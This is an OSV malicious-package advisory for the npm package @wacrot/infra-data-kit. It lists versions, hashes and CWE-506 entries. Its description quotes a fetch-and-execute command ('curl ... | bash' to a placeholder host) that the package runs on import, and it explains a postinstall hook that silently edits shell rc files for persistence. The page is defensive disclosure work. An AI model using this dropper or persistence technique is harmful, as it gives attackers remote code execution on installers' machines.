MAL-2026-5834

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@wacrot/infra-data-kit/MAL-2026-5834.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5834

Published

2026-06-15T20:55:15Z

Modified

2026-06-15T21:46:53.748829439Z

Summary

Malicious code in @wacrot/infra-data-kit (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1)

On any require() or import of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached bash -c 'curl -fsSL https://example.com/script.sh | bash' via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (npx no-install @wacrot/infra-data-kit npm run scripts/setup.js) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (export MY_CUSTOM_VAR='test'), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through npx no-install further obscures lifecycle inspection. The destination URL https://example.com/script.sh is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006715",
            "import_time": "2026-06-15T21:33:35.207481775Z",
            "source": "amazon-inspector",
            "versions": [
                "2.1.0"
            ],
            "modified_time": "2026-06-15T20:55:22Z",
            "sha256": "1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1"
        },
        {
            "id": "IN-MAL-2026-006716",
            "import_time": "2026-06-15T21:33:35.316809388Z",
            "source": "amazon-inspector",
            "versions": [
                "2.0.6"
            ],
            "sha256": "9b786922d30a4bf2895ccc72832e755017c2a6086b60a41546477353cad7a002",
            "modified_time": "2026-06-15T20:55:23Z"
        },
        {
            "id": "IN-MAL-2026-006711",
            "import_time": "2026-06-15T21:33:34.807092723Z",
            "versions": [
                "2.1.4"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-15T20:55:15Z",
            "sha256": "ed3dbc1e873b9aeef4db7a0118d43e32ef55ba4f0bdbe60601f26dfb9f9465df"
        },
        {
            "id": "IN-MAL-2026-006718",
            "import_time": "2026-06-15T21:33:35.480808304Z",
            "source": "amazon-inspector",
            "versions": [
                "2.0.9"
            ],
            "sha256": "2fae648a1c4f2f52a58e92d0877909d0c257de08ac85648b26c05cfaeed735c4",
            "modified_time": "2026-06-15T20:55:25Z"
        },
        {
            "id": "IN-MAL-2026-006713",
            "import_time": "2026-06-15T21:33:35.017855228Z",
            "source": "amazon-inspector",
            "versions": [
                "2.0.8"
            ],
            "modified_time": "2026-06-15T20:55:20Z",
            "sha256": "48b21f9afd4984fc6e40d4d6d9d22118936bbbda62480fceb51e2a1e05d7f2fe"
        },
        {
            "id": "IN-MAL-2026-006717",
            "import_time": "2026-06-15T21:33:35.394317825Z",
            "source": "amazon-inspector",
            "versions": [
                "2.0.7"
            ],
            "modified_time": "2026-06-15T20:55:23Z",
            "sha256": "5a287471a6a92d725824819ebe06e1f705cbce4f1a67443be50872c034e4eb6e"
        },
        {
            "id": "IN-MAL-2026-006714",
            "import_time": "2026-06-15T21:33:35.116906903Z",
            "source": "amazon-inspector",
            "versions": [
                "2.1.1"
            ],
            "modified_time": "2026-06-15T20:55:21Z",
            "sha256": "6dffaaac09416f6badd0af76a7fd930025004f4d7eed785c4cb8d275a55287cc"
        },
        {
            "id": "IN-MAL-2026-006712",
            "import_time": "2026-06-15T21:33:34.909205154Z",
            "source": "amazon-inspector",
            "versions": [
                "2.1.2"
            ],
            "modified_time": "2026-06-15T20:55:20Z",
            "sha256": "7ef0c37effa4d55594ab9723da3aa953b0a6826726083f7ae264d913389e36ed"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @wacrot/infra-data-kit

Package

Name: @wacrot/infra-data-kit; View open source insights on deps.dev
Purl: pkg:npm/%40wacrot%2Finfra-data-kit

Affected ranges

Affected versions

2.*

2.0.6

2.0.7

2.0.8

2.0.9

2.1.0

2.1.1

2.1.2

2.1.4

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@wacrot/infra-data-kit/MAL-2026-5834.json"

indicators

{
    "package_integrity": [
        {
            "filename": "infra-data-kit-2.1.0.tgz",
            "hashes": {
                "sha1": "4188fe2d34ce05ed66bd83483f73de3c86a8a8a0",
                "sha512_sri": "sha512-XpeWsnqqKxb4Jxvfw11PuN92GKvEtjZSGpdnuUiQIAjO93pGQd+mGz6wuXjC8sifpmPzPxhmPrTb4jj4LL7WKw=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "src/index.js",
            "sha256": "60a944d3f7a425ddd9b05ddf51d5d55cac6109402378680018cd5e2fb696ee50",
            "tlsh": "ec22fc0e74fa6110c25b31b611abd0daba34c853250c9d51b99d87e06fd4abc9af7b8c"
        },
        {
            "path": "scripts/setup.js",
            "sha256": "1bf9d290d4dcfae9500aca1025b84c41c779865830c0455aa84c06ad96f33ac6",
            "tlsh": "263183678afd5f7705220952b34f20353c21e3923510f69099a8694d4fc4ad8c6c3aed"
        },
        {
            "path": "package.json",
            "sha256": "feebb916f42e8438ea43ae30057cc0219bfd8e26a249bbcde85734dd0d231a46",
            "tlsh": "94017b26ee309d2345d865521da92203a761a8870b88fc1937c7402c8f4e77f21fe76e"
        }
    ]
}